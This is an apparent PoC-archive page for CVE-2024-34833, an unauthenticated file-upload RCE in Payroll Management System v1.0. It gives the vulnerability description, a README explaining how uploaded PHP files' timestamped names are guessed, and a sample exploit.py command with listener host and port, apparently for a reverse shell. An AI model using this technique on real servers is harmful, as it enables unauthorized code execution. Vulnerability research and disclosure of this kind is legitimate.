Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-34833 PoC — Payroll Management System 安全漏洞

Source
https://github.com/ShellUnease/CVE-2024-34833-payroll-management-system-rce
Associated Vulnerability
Title:Payroll Management System 安全漏洞 (CVE-2024-34833)
Description:Sourcecodester Payroll Management System v1.0 is vulnerable to File Upload. Users can upload images via the "save_settings" page. An unauthenticated attacker can leverage this functionality to upload a malicious PHP file instead. Successful exploitation of this vulnerability results in the ability to execute arbitrary code as the user running the web server.
Readme
# CVE-2024-34833 Payroll Management System RCE (Unauthenticated) PoC

![](./payroll-cover.jpg)

RCE via file upload for https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. The filenames have timestamp prepended with a minute accuracy. The script tries to guess the filename using the timestamp of the current, previous and next minute.

## Vulnerability description
Payroll Management System v1.0 allows users to upload images via the "save_settings" page. An unauthenticated attacker can leverage this functionality to upload a malicious PHP file instead. The uploaded files are stored in a publicly accessible folder and have a timestamp with minute precision appended to their filenames, which can be easily calculated. Successful exploitation of this vulnerability results in the ability to execute arbitrary code as the user running the web server.
## Example usage
```commandline
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https
```

## Example video
![](./example.gif)
File Snapshot

 [4.0K]  /data/pocs/b130029ac3d02414f162bf806321e4c58eb95649
├── [890K]  example.gif
├── [4.0K]  exploit.py
├── [ 50K]  payroll-cover.jpg
├── [9.2K]  php_reverse_shell.php
└── [1.0K]  README.md

0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →